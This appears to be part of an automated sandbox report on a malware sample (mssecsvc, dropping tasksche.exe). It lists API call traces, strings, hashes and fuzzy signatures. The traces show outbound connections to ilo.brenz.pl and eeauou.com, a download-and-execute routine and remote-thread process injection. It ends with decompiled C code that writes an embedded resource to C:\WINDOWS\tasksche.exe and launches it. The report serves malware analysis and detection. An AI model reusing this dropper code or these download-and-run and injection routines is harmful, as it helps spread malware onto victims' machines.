                                                                                                                                                  • Part of subcall function 00AC3405: MapViewOfFile.KERNEL32(?,00000006,00000000,?,?,?,00000120,00000000), ref: 00AC3493
                                                                                                                                                  • Part of subcall function 00AC3405: CloseHandle.KERNEL32(?,00000000,?,00000120,00000000), ref: 00AC34A0
                                                                                                                                                  • Part of subcall function 00AC3405: UnmapViewOfFile.KERNEL32(?), ref: 00AC34B8
                                                                                                                                                Strings
                                                                                                                                                • SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List, xrefs: 00AC3F0C
                                                                                                                                                • C:\Program Files (x86)\QxmjpcazkXhrxEMyZMHZXXEYGdZKTLIuGGuluQecNfOrZXEwSk\mcelwciKpeNAdrHBUbBbQgwqJRdg.exe, xrefs: 00AC3EDF, 00AC3EF4, 00AC3F0B, 00AC4195, 00AC41DB
                                                                                                                                                • C:,, xrefs: 00AC3EF6, 00AC3F08
                                                                                                                                                • C:\WINDOWS\TASKSCHE.EXE, xrefs: 00AC41DA
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000004.00000002.502417271.0000000000AC0000.00000040.10000000.00040000.00000000.sdmp, Offset: 00AC0000, based on PE: false
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_4_2_ac0000_mssecsvc.jbxd
                                                                                                                                                Yara matches
                                                                                                                                                Similarity
                                                                                                                                                • API ID: CloseCreateFileHandle$ThreadView$AddressEventInformationModuleNameOpenProcQuerySectionSystemUnmapwsprintf
                                                                                                                                                • String ID: C:,$C:\Program Files (x86)\QxmjpcazkXhrxEMyZMHZXXEYGdZKTLIuGGuluQecNfOrZXEwSk\mcelwciKpeNAdrHBUbBbQgwqJRdg.exe$C:\WINDOWS\TASKSCHE.EXE$SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List
                                                                                                                                                • API String ID: 541178049-1428418298
                                                                                                                                                • Opcode ID: 3176691832235144c822bda6bdece0b9c65d83022bcced3ec1f9b4779e38ef98
                                                                                                                                                • Instruction ID: 44963c5d39a22d6718f2fd3c2ac2f3ca758a282ca8e57036e7ca9096d5059e97
                                                                                                                                                • Opcode Fuzzy Hash: 3176691832235144c822bda6bdece0b9c65d83022bcced3ec1f9b4779e38ef98
                                                                                                                                                • Instruction Fuzzy Hash: 55A1EF72508248BFEB219F248C5EFEA7BACEF45300F06465CE84A8E082D6F45F45C7A5
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                Function 7FEA3F60 Relevance: 23.0, APIs: 11, Strings: 2, Instructions: 215librarystringthreadCOMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                APIs
                                                                                                                                                • LoadLibraryA.KERNEL32(7FEA3F54), ref: 7FEA3F60
                                                                                                                                                  • Part of subcall function 7FEA3F8F: LoadLibraryA.KERNEL32(7FEA3F83), ref: 7FEA3F8F
                                                                                                                                                  • Part of subcall function 7FEA3F8F: WSAStartup.WS2_32(00000101), ref: 7FEA3FCE
                                                                                                                                                  • Part of subcall function 7FEA3F8F: CreateThread.KERNEL32(00000000,00000000,Function_00003888,00000000,00000000), ref: 7FEA3FE9
                                                                                                                                                  • Part of subcall function 7FEA3F8F: CloseHandle.KERNEL32(?,00000000), ref: 7FEA3FF2
                                                                                                                                                  • Part of subcall function 7FEA3F8F: CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,?,00000000), ref: 7FEA3FFF
                                                                                                                                                  • Part of subcall function 7FEA3F8F: socket.WS2_32(00000002,00000001,00000000), ref: 7FEA4097
                                                                                                                                                  • Part of subcall function 7FEA3F8F: connect.WS2_32(6F6C6902,7FEA3B09,00000010), ref: 7FEA40B1
                                                                                                                                                  • Part of subcall function 7FEA3F8F: GetVersionExA.KERNEL32(?,?,00000000), ref: 7FEA40FB
                                                                                                                                                • lstrlen.KERNEL32(ilo.brenz.pl,?,00000000), ref: 7FEA4057
                                                                                                                                                • gethostbyname.WS2_32(ilo.brenz.pl), ref: 7FEA4066
                                                                                                                                                • wsprintfA.USER32 ref: 7FEA4179
                                                                                                                                                • CreateThread.KERNEL32(00000000,00000000,Function_00003819,6F6C6902,00000000), ref: 7FEA41B4
                                                                                                                                                • CloseHandle.KERNEL32(?,00000000,6F6C6902,7FEA6AA2,00000000,00000000), ref: 7FEA41BD
                                                                                                                                                • GetTickCount.KERNEL32 ref: 7FEA41F6
                                                                                                                                                Strings
                                                                                                                                                • C:\Program Files (x86)\QxmjpcazkXhrxEMyZMHZXXEYGdZKTLIuGGuluQecNfOrZXEwSk\mcelwciKpeNAdrHBUbBbQgwqJRdg.exe, xrefs: 7FEA4195, 7FEA41DB
                                                                                                                                                • \DEVICE\AFD\ENDPOINT, xrefs: 7FEA41DA
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000004.00000002.505701930.000000007FEA0000.00000040.10000000.00040000.00000000.sdmp, Offset: 7FEA0000, based on PE: false
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_4_2_7fea0000_mssecsvc.jbxd
                                                                                                                                                Yara matches
                                                                                                                                                Similarity
                                                                                                                                                • API ID: Create$CloseHandleLibraryLoadThread$CountEventStartupTickVersionconnectgethostbynamelstrlensocketwsprintf
                                                                                                                                                • String ID: C:\Program Files (x86)\QxmjpcazkXhrxEMyZMHZXXEYGdZKTLIuGGuluQecNfOrZXEwSk\mcelwciKpeNAdrHBUbBbQgwqJRdg.exe$\DEVICE\AFD\ENDPOINT
                                                                                                                                                • API String ID: 2996464229-1462811877
                                                                                                                                                • Opcode ID: 98c4dc3622c81e610166b3295d4bccfe550f8d2832964dac318e74891848542e
                                                                                                                                                • Instruction ID: 9d7a0edf8395d02bdb3222331a00bfe847c5167623d17b4b3927ccf0a8489e01
                                                                                                                                                • Opcode Fuzzy Hash: 98c4dc3622c81e610166b3295d4bccfe550f8d2832964dac318e74891848542e
                                                                                                                                                • Instruction Fuzzy Hash: 5381FE71508388BFEB228F348C59BEA7BADEF41304F040659E84A9E091C7F66F45C762
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                Function 00AC3F60 Relevance: 23.0, APIs: 11, Strings: 2, Instructions: 215librarystringthreadCOMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                APIs
                                                                                                                                                • LoadLibraryA.KERNEL32(00AC3F54), ref: 00AC3F60
                                                                                                                                                  • Part of subcall function 00AC3F8F: LoadLibraryA.KERNEL32(00AC3F83), ref: 00AC3F8F
                                                                                                                                                  • Part of subcall function 00AC3F8F: WSAStartup.WS2_32(00000101), ref: 00AC3FCE
                                                                                                                                                  • Part of subcall function 00AC3F8F: CreateThread.KERNEL32(00000000,00000000,Function_00003888,00000000,00000000), ref: 00AC3FE9
                                                                                                                                                  • Part of subcall function 00AC3F8F: CloseHandle.KERNEL32(?,00000000), ref: 00AC3FF2
                                                                                                                                                  • Part of subcall function 00AC3F8F: CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,?,00000000), ref: 00AC3FFF
                                                                                                                                                  • Part of subcall function 00AC3F8F: socket.WS2_32(00000002,00000001,00000000), ref: 00AC4097
                                                                                                                                                  • Part of subcall function 00AC3F8F: connect.WS2_32(6F6C6902,00AC3B09,00000010), ref: 00AC40B1
                                                                                                                                                  • Part of subcall function 00AC3F8F: GetVersionExA.KERNEL32(?,?,00000000), ref: 00AC40FB
                                                                                                                                                • lstrlen.KERNEL32(ilo.brenz.pl,?,00000000), ref: 00AC4057
                                                                                                                                                • gethostbyname.WS2_32(ilo.brenz.pl), ref: 00AC4066
                                                                                                                                                • wsprintfA.USER32 ref: 00AC4179
                                                                                                                                                • CreateThread.KERNEL32(00000000,00000000,Function_00003819,6F6C6902,00000000), ref: 00AC41B4
                                                                                                                                                • CloseHandle.KERNEL32(?,00000000,6F6C6902,00AC6AA2,00000000,00000000), ref: 00AC41BD
                                                                                                                                                • GetTickCount.KERNEL32 ref: 00AC41F6
                                                                                                                                                Strings
                                                                                                                                                • C:\Program Files (x86)\QxmjpcazkXhrxEMyZMHZXXEYGdZKTLIuGGuluQecNfOrZXEwSk\mcelwciKpeNAdrHBUbBbQgwqJRdg.exe, xrefs: 00AC4195, 00AC41DB
                                                                                                                                                • C:\WINDOWS\TASKSCHE.EXE, xrefs: 00AC41DA
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000004.00000002.502417271.0000000000AC0000.00000040.10000000.00040000.00000000.sdmp, Offset: 00AC0000, based on PE: false
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_4_2_ac0000_mssecsvc.jbxd
                                                                                                                                                Yara matches
                                                                                                                                                Similarity
                                                                                                                                                • API ID: Create$CloseHandleLibraryLoadThread$CountEventStartupTickVersionconnectgethostbynamelstrlensocketwsprintf
                                                                                                                                                • String ID: C:\Program Files (x86)\QxmjpcazkXhrxEMyZMHZXXEYGdZKTLIuGGuluQecNfOrZXEwSk\mcelwciKpeNAdrHBUbBbQgwqJRdg.exe$C:\WINDOWS\TASKSCHE.EXE
                                                                                                                                                • API String ID: 2996464229-1685824476
                                                                                                                                                • Opcode ID: 98c4dc3622c81e610166b3295d4bccfe550f8d2832964dac318e74891848542e
                                                                                                                                                • Instruction ID: c58e74f80873d8b372d4a7d56a95447d20665ec7752c72425da5cf5d493acb91
                                                                                                                                                • Opcode Fuzzy Hash: 98c4dc3622c81e610166b3295d4bccfe550f8d2832964dac318e74891848542e
                                                                                                                                                • Instruction Fuzzy Hash: 9F81F171508258BFEB219F348C6ABEA7FACEF45310F05465CE88A8E182C6F45F45C765
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                Function 7FEA388E Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 127networksleeptimeCOMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                APIs
                                                                                                                                                • GetSystemTime.KERNEL32(7FEA7584), ref: 7FEA389F
                                                                                                                                                • Sleep.KERNEL32(0000EA60), ref: 7FEA3911
                                                                                                                                                • InternetGetConnectedState.WININET(?,00000000), ref: 7FEA392A
                                                                                                                                                • gethostbyname.WS2_32(0D278125), ref: 7FEA396C
                                                                                                                                                • socket.WS2_32(00000002,00000001,00000000), ref: 7FEA3981
                                                                                                                                                • ioctlsocket.WS2_32(?,8004667E), ref: 7FEA399A
                                                                                                                                                • connect.WS2_32(?,?,00000010), ref: 7FEA39B3
                                                                                                                                                • Sleep.KERNEL32(?,00000010,BB010002,00000000,8004667E,?,00000001), ref: 7FEA39C1
                                                                                                                                                • closesocket.WS2_32 ref: 7FEA3A20
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000004.00000002.505701930.000000007FEA0000.00000040.10000000.00040000.00000000.sdmp, Offset: 7FEA0000, based on PE: false
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_4_2_7fea0000_mssecsvc.jbxd
                                                                                                                                                Yara matches
                                                                                                                                                Similarity
                                                                                                                                                • API ID: Sleep$ConnectedInternetStateSystemTimeclosesocketconnectgethostbynameioctlsocketsocket
                                                                                                                                                • String ID: eeauou.com
                                                                                                                                                • API String ID: 159131500-1932208585
                                                                                                                                                • Opcode ID: b9cbcd502034ca6391bc477693aeae1c9470f5e239758c46d06d44a479c792e4
                                                                                                                                                • Instruction ID: 863d8d36320b09296de0ef8eaaf11b1bc77ac7fb125708de1e92797cd0aa2464
                                                                                                                                                • Opcode Fuzzy Hash: b9cbcd502034ca6391bc477693aeae1c9470f5e239758c46d06d44a479c792e4
                                                                                                                                                • Instruction Fuzzy Hash: 4641C531604348BEDB218F208C49BE9BB6EEF85714F004159F90AEE1C1DBF79B409720
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                Function 7FEA07AC Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 62processthreadinjectionCOMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                APIs
                                                                                                                                                  • Part of subcall function 7FEA144A: LookupPrivilegeValueA.ADVAPI32(00000000,?), ref: 7FEA145A
                                                                                                                                                  • Part of subcall function 7FEA144A: NtAdjustPrivilegesToken.NTDLL(?,00000000,?,00000000,00000000,00000000), ref: 7FEA146A
                                                                                                                                                • CloseHandle.KERNEL32(?), ref: 7FEA05AD
                                                                                                                                                • FreeLibrary.KERNEL32(745B0000,?,7FEA079B,00000000,000077C4,00000000,?,00000002,00000000,00000040,00000000,000077C4), ref: 7FEA07B8
                                                                                                                                                • CloseHandle.KERNEL32(?,?,7FEA079B,00000000,000077C4,00000000,?,00000002,00000000,00000040,00000000,000077C4), ref: 7FEA07BF
                                                                                                                                                • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 7FEA07C9
                                                                                                                                                • Process32First.KERNEL32 ref: 7FEA07DC
                                                                                                                                                • Process32Next.KERNEL32 ref: 7FEA07ED
                                                                                                                                                • OpenProcess.KERNEL32(0000002A,00000000,?,?,?,?,?,?,00000002,00000000,00000040,00000000,000077C4), ref: 7FEA0805
                                                                                                                                                • CreateRemoteThread.KERNEL32(?,00000000,00000000,-00003C38,00000002,00000000), ref: 7FEA0842
                                                                                                                                                • CloseHandle.KERNEL32(?,?,?,?,?,?,00000002,00000000,00000040,00000000,000077C4), ref: 7FEA085D
                                                                                                                                                • CloseHandle.KERNEL32 ref: 7FEA086C
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000004.00000002.505701930.000000007FEA0000.00000040.10000000.00040000.00000000.sdmp, Offset: 7FEA0000, based on PE: false
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_4_2_7fea0000_mssecsvc.jbxd
                                                                                                                                                Yara matches
                                                                                                                                                Similarity
                                                                                                                                                • API ID: CloseHandle$CreateProcess32$AdjustFirstFreeLibraryLookupNextOpenPrivilegePrivilegesProcessRemoteSnapshotThreadTokenToolhelp32Value
                                                                                                                                                • String ID: csrs
                                                                                                                                                • API String ID: 3908997113-2321902090
                                                                                                                                                • Opcode ID: 214ed8d877d5af5bdcbfeb92dfaf8d9be1786541dc830f75d8708442990ea625
                                                                                                                                                • Instruction ID: 84bb5cd5c05f80c9023c3546aa49ac891d3b4ee2c4a24ef2c536b510610674c9
                                                                                                                                                • Opcode Fuzzy Hash: 214ed8d877d5af5bdcbfeb92dfaf8d9be1786541dc830f75d8708442990ea625
                                                                                                                                                • Instruction Fuzzy Hash: 59113D30502205BBEB255F31CD49BBF3A6DEF44711F00016CFE4B9E081DAB69B018AAA
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                Function 7FEA2768 Relevance: 12.1, APIs: 8, Instructions: 85networkCOMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                APIs
                                                                                                                                                • GetTempPathA.KERNEL32(00000104), ref: 7FEA278C
                                                                                                                                                  • Part of subcall function 7FEA27A7: GetTempFileNameA.KERNEL32(?,7FEA27A3,00000000,?), ref: 7FEA27A8
                                                                                                                                                  • Part of subcall function 7FEA27A7: CreateFileA.KERNEL32(?,40000000,00000001,00000000,00000002,00000000,00000000,?,7FEA27A3,00000000,?), ref: 7FEA27C3
                                                                                                                                                  • Part of subcall function 7FEA27A7: InternetReadFile.WININET(?,?,00000104), ref: 7FEA27DD
                                                                                                                                                  • Part of subcall function 7FEA27A7: WriteFile.KERNEL32(?,?,?,?,00000000,00000000,00000104,?,00000000,?,7FEA27A3,00000000,?), ref: 7FEA27F3
                                                                                                                                                  • Part of subcall function 7FEA27A7: CloseHandle.KERNEL32(?,00000104,?,00000000,?,7FEA27A3,00000000,?), ref: 7FEA27FF
                                                                                                                                                  • Part of subcall function 7FEA27A7: CreateProcessA.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,00000104,?,00000000,?,7FEA27A3), ref: 7FEA2823
                                                                                                                                                  • Part of subcall function 7FEA27A7: InternetCloseHandle.WININET(?), ref: 7FEA2833
                                                                                                                                                • InternetCloseHandle.WININET(00000000), ref: 7FEA283A
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000004.00000002.505701930.000000007FEA0000.00000040.10000000.00040000.00000000.sdmp, Offset: 7FEA0000, based on PE: false
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_4_2_7fea0000_mssecsvc.jbxd
                                                                                                                                                Yara matches
                                                                                                                                                Similarity
                                                                                                                                                • API ID: File$CloseHandleInternet$CreateTemp$NamePathProcessReadWrite
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 1995088466-0
                                                                                                                                                • Opcode ID: 2d38deb6aefaf5fafd3701ae89f7df2c8b85ad1d9cd8c4e8e23ab3e50bde978c
                                                                                                                                                • Instruction ID: c1ca02f886126752e6f21441145c1cc666a01a53b77e18b91c733c89828b9d16
                                                                                                                                                • Opcode Fuzzy Hash: 2d38deb6aefaf5fafd3701ae89f7df2c8b85ad1d9cd8c4e8e23ab3e50bde978c
                                                                                                                                                • Instruction Fuzzy Hash: A821C0B1145306BFE7215A20CC8AFFF3A6DEF95B10F000119FA4AAD081D7B29B15C6A6
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                Function 00AC2768 Relevance: 12.1, APIs: 8, Instructions: 85networkCOMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                APIs
                                                                                                                                                • GetTempPathA.KERNEL32(00000104), ref: 00AC278C
                                                                                                                                                  • Part of subcall function 00AC27A7: GetTempFileNameA.KERNEL32(?,00AC27A3,00000000,?), ref: 00AC27A8
                                                                                                                                                  • Part of subcall function 00AC27A7: CreateFileA.KERNEL32(?,40000000,00000001,00000000,00000002,00000000,00000000,?,00AC27A3,00000000,?), ref: 00AC27C3
                                                                                                                                                  • Part of subcall function 00AC27A7: InternetReadFile.WININET(?,?,00000104), ref: 00AC27DD
                                                                                                                                                  • Part of subcall function 00AC27A7: WriteFile.KERNEL32(?,?,?,?,00000000,00000000,00000104,?,00000000,?,00AC27A3,00000000,?), ref: 00AC27F3
                                                                                                                                                  • Part of subcall function 00AC27A7: CloseHandle.KERNEL32(?,00000104,?,00000000,?,00AC27A3,00000000,?), ref: 00AC27FF
                                                                                                                                                  • Part of subcall function 00AC27A7: CreateProcessA.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,00000104,?,00000000,?,00AC27A3), ref: 00AC2823
                                                                                                                                                  • Part of subcall function 00AC27A7: InternetCloseHandle.WININET(?), ref: 00AC2833
                                                                                                                                                • InternetCloseHandle.WININET(00000000), ref: 00AC283A
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000004.00000002.502417271.0000000000AC0000.00000040.10000000.00040000.00000000.sdmp, Offset: 00AC0000, based on PE: false
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_4_2_ac0000_mssecsvc.jbxd
                                                                                                                                                Yara matches
                                                                                                                                                Similarity
                                                                                                                                                • API ID: File$CloseHandleInternet$CreateTemp$NamePathProcessReadWrite
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 1995088466-0
                                                                                                                                                • Opcode ID: 2d38deb6aefaf5fafd3701ae89f7df2c8b85ad1d9cd8c4e8e23ab3e50bde978c
                                                                                                                                                • Instruction ID: f02e171e6f867a4f55d801f01784d921817fb8576e545cc77b9667b7c312b68a
                                                                                                                                                • Opcode Fuzzy Hash: 2d38deb6aefaf5fafd3701ae89f7df2c8b85ad1d9cd8c4e8e23ab3e50bde978c
                                                                                                                                                • Instruction Fuzzy Hash: 3921AFB1144206BFE7215B20CC8EFFF7A2DEF95B10F000529FA4999082D7B19E5587B6
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                Function 7FEA27A7 Relevance: 12.1, APIs: 8, Instructions: 65filenetworkprocessCOMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                APIs
                                                                                                                                                • GetTempFileNameA.KERNEL32(?,7FEA27A3,00000000,?), ref: 7FEA27A8
                                                                                                                                                • CreateFileA.KERNEL32(?,40000000,00000001,00000000,00000002,00000000,00000000,?,7FEA27A3,00000000,?), ref: 7FEA27C3
                                                                                                                                                • InternetReadFile.WININET(?,?,00000104), ref: 7FEA27DD
                                                                                                                                                • WriteFile.KERNEL32(?,?,?,?,00000000,00000000,00000104,?,00000000,?,7FEA27A3,00000000,?), ref: 7FEA27F3
                                                                                                                                                • CloseHandle.KERNEL32(?,00000104,?,00000000,?,7FEA27A3,00000000,?), ref: 7FEA27FF
                                                                                                                                                • CreateProcessA.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,00000104,?,00000000,?,7FEA27A3), ref: 7FEA2823
                                                                                                                                                • InternetCloseHandle.WININET(?), ref: 7FEA2833
                                                                                                                                                • InternetCloseHandle.WININET(00000000), ref: 7FEA283A
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000004.00000002.505701930.000000007FEA0000.00000040.10000000.00040000.00000000.sdmp, Offset: 7FEA0000, based on PE: false
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_4_2_7fea0000_mssecsvc.jbxd
                                                                                                                                                Yara matches
                                                                                                                                                Similarity
                                                                                                                                                • API ID: File$CloseHandleInternet$Create$NameProcessReadTempWrite
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 3452404049-0
                                                                                                                                                • Opcode ID: bbf5c5561a5178fb7ef464295b4b729c13e68fcf671b41c3dcb44b7c67eff673
                                                                                                                                                • Instruction ID: 5e72b063bb693ddb0cec3f1fad15b0eca3dde0b314aeb166be0943229ddb0145
                                                                                                                                                • Opcode Fuzzy Hash: bbf5c5561a5178fb7ef464295b4b729c13e68fcf671b41c3dcb44b7c67eff673
                                                                                                                                                • Instruction Fuzzy Hash: 56116DB1100606BBEB250B20CC4AFFB7A6DEF85B14F004519FA06AD080DBF5AB5196A8
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                Function 7FEA10CE Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 54libraryloaderCOMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                APIs
                                                                                                                                                • GetModuleHandleA.KERNEL32(01C8F87C), ref: 7FEA113D
                                                                                                                                                • GetProcAddress.KERNEL32(00000000,7FEA11D6), ref: 7FEA1148
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000004.00000002.505701930.000000007FEA0000.00000040.10000000.00040000.00000000.sdmp, Offset: 7FEA0000, based on PE: false
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_4_2_7fea0000_mssecsvc.jbxd
                                                                                                                                                Yara matches
                                                                                                                                                Similarity
                                                                                                                                                • API ID: AddressHandleModuleProc
                                                                                                                                                • String ID: .DLL
                                                                                                                                                • API String ID: 1646373207-899428287
                                                                                                                                                • Opcode ID: 82aecbdba2b6c313781f1a35b90d956a9f8d4ce40e6713e346beece58f6b0b34
                                                                                                                                                • Instruction ID: 2f73ade5318114d7e9bf37e66f68aeb85e6b2a503a621854e5f62f64a3af89c8
                                                                                                                                                • Opcode Fuzzy Hash: 82aecbdba2b6c313781f1a35b90d956a9f8d4ce40e6713e346beece58f6b0b34
                                                                                                                                                • Instruction Fuzzy Hash: D701D634607104EACB538E38C845BFE3B7EFF14275F004115D91A8F159C77A9A508F95
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                Function 00AC10CE Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 54libraryloaderCOMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                APIs
                                                                                                                                                • GetModuleHandleA.KERNEL32(01C8F87C), ref: 00AC113D
                                                                                                                                                • GetProcAddress.KERNEL32(00000000,00AC11D6), ref: 00AC1148
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000004.00000002.502417271.0000000000AC0000.00000040.10000000.00040000.00000000.sdmp, Offset: 00AC0000, based on PE: false
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_4_2_ac0000_mssecsvc.jbxd
                                                                                                                                                Yara matches
                                                                                                                                                Similarity
                                                                                                                                                • API ID: AddressHandleModuleProc
                                                                                                                                                • String ID: .DLL
                                                                                                                                                • API String ID: 1646373207-899428287
                                                                                                                                                • Opcode ID: 82aecbdba2b6c313781f1a35b90d956a9f8d4ce40e6713e346beece58f6b0b34
                                                                                                                                                • Instruction ID: 4f86a93ba56e1f864de5d1aa44c5c285daa7e04197ec747e8520e707f490b278
                                                                                                                                                • Opcode Fuzzy Hash: 82aecbdba2b6c313781f1a35b90d956a9f8d4ce40e6713e346beece58f6b0b34
                                                                                                                                                • Instruction Fuzzy Hash: CF01C030707001EACF648F2CC849FAA3B7CEF06355F16421CEA1A8B257C778CE808696
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                Execution Graph

                                                                                                                                                Execution Coverage:71.8%
                                                                                                                                                Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                Signature Coverage:0%
                                                                                                                                                Total number of Nodes:37
                                                                                                                                                Total number of Limit Nodes:9

                                                                                                                                                Callgraph

                                                                                                                                                Executed Functions

                                                                                                                                                Function 00407CE0 Relevance: 50.9, APIs: 18, Strings: 11, Instructions: 175libraryloaderfileCOMMON
                                                                                                                                                Download Yara Rule

                                                                                                                                                Control-flow Graph

                                                                                                                                                C-Code - Quality: 86%
                                                                                                                                                			E00407CE0() {
				void _v259;
				char _v260;
				void _v519;
				char _v520;
				struct _STARTUPINFOA _v588;
				struct _PROCESS_INFORMATION _v604;
				long _v608;
				_Unknown_base(*)()* _t36;
				void* _t38;
				void* _t39;
				void* _t50;
				int _t59;
				struct HINSTANCE__* _t104;
				struct HRSRC__* _t105;
				void* _t107;
				void* _t108;
				long _t109;
				intOrPtr _t121;
				intOrPtr _t122;

				_t104 = GetModuleHandleW(L"kernel32.dll");
				if(_t104 != 0) {
					 *0x431478 = GetProcAddress(_t104, "CreateProcessA");
					 *0x431458 = GetProcAddress(_t104, "CreateFileA");
					 *0x431460 = GetProcAddress(_t104, "WriteFile");
					_t36 = GetProcAddress(_t104, "CloseHandle");
					 *0x43144c = _t36;
					if( *0x431478 != 0) {
						_t121 =  *0x431458; // 0x7620f7b0
						if(_t121 != 0) {
							_t122 =  *0x431460; // 0x7620fc30
							if(_t122 != 0 && _t36 != 0) {
								_t105 = FindResourceA(0, 0x727, "R");
								if(_t105 != 0) {
									_t38 = LoadResource(0, _t105);
									if(_t38 != 0) {
										_t39 = LockResource(_t38);
										_v608 = _t39;
										if(_t39 != 0) {
											_t109 = SizeofResource(0, _t105);
											if(_t109 != 0) {
												_v520 = 0;
												memset( &_v519, 0, 0x40 << 2);
												asm("stosw");
												asm("stosb");
												_v260 = 0;
												memset( &_v259, 0, 0x40 << 2);
												asm("stosw");
												asm("stosb");
												sprintf( &_v520, "C:\\%s\\%s", "WINDOWS", "tasksche.exe");
												sprintf( &_v260, "C:\\%s\\qeriuwjhrf", "WINDOWS");
												MoveFileExA( &_v520,  &_v260, 1); // executed
												_t50 = CreateFileA( &_v520, 0x40000000, 0, 0, 2, 4, 0); // executed
												_t107 = _t50;
												if(_t107 != 0xffffffff) {
													WriteFile(_t107, _v608, _t109,  &_v608, 0); // executed
													FindCloseChangeNotification(_t107); // executed
													_v604.hThread = 0;
													_v604.dwProcessId = 0;
													_v604.dwThreadId = 0;
													memset( &(_v588.lpReserved), 0, 0x10 << 2);
													asm("repne scasb");
													_v604.hProcess = 0;
													_t108 = " /i";
													asm("repne scasb");
													memcpy( &_v520 - 1, _t108, 0 << 2);
													memcpy(_t108 + 0x175b75a, _t108, 0);
													_v588.cb = 0x44;
													_v588.wShowWindow = 0;
													_v588.dwFlags = 0x81;
													_t59 = CreateProcessA(0,  &_v520, 0, 0, 0, 0x8000000, 0, 0,  &_v588,  &_v604); // executed
													if(_t59 != 0) {
														CloseHandle(_v604.hThread);
														CloseHandle(_v604);
													}
												}
											}
										}
									}
								}
							}
						}
					}
				}
				return 0;
			}






















                                                                                                                                                0x00407cf5
                                                                                                                                                0x00407cfb
                                                                                                                                                0x00407d15
                                                                                                                                                0x00407d22
                                                                                                                                                0x00407d2f
                                                                                                                                                0x00407d34
                                                                                                                                                0x00407d3c
                                                                                                                                                0x00407d43
                                                                                                                                                0x00407d49
                                                                                                                                                0x00407d4f
                                                                                                                                                0x00407d55
                                                                                                                                                0x00407d5b
                                                                                                                                                0x00407d7a
                                                                                                                                                0x00407d7e
                                                                                                                                                0x00407d86
                                                                                                                                                0x00407d8e
                                                                                                                                                0x00407d95
                                                                                                                                                0x00407d9d
                                                                                                                                                0x00407da1
                                                                                                                                                0x00407daf
                                                                                                                                                0x00407db3
                                                                                                                                                0x00407dc4
                                                                                                                                                0x00407dc8
                                                                                                                                                0x00407dca
                                                                                                                                                0x00407dcc
                                                                                                                                                0x00407ddb
                                                                                                                                                0x00407de2
                                                                                                                                                0x00407def
                                                                                                                                                0x00407df1
                                                                                                                                                0x00407e01
                                                                                                                                                0x00407e18
                                                                                                                                                0x00407e2c
                                                                                                                                                0x00407e43
                                                                                                                                                0x00407e49
                                                                                                                                                0x00407e4e
                                                                                                                                                0x00407e61
                                                                                                                                                0x00407e68
                                                                                                                                                0x00407e72
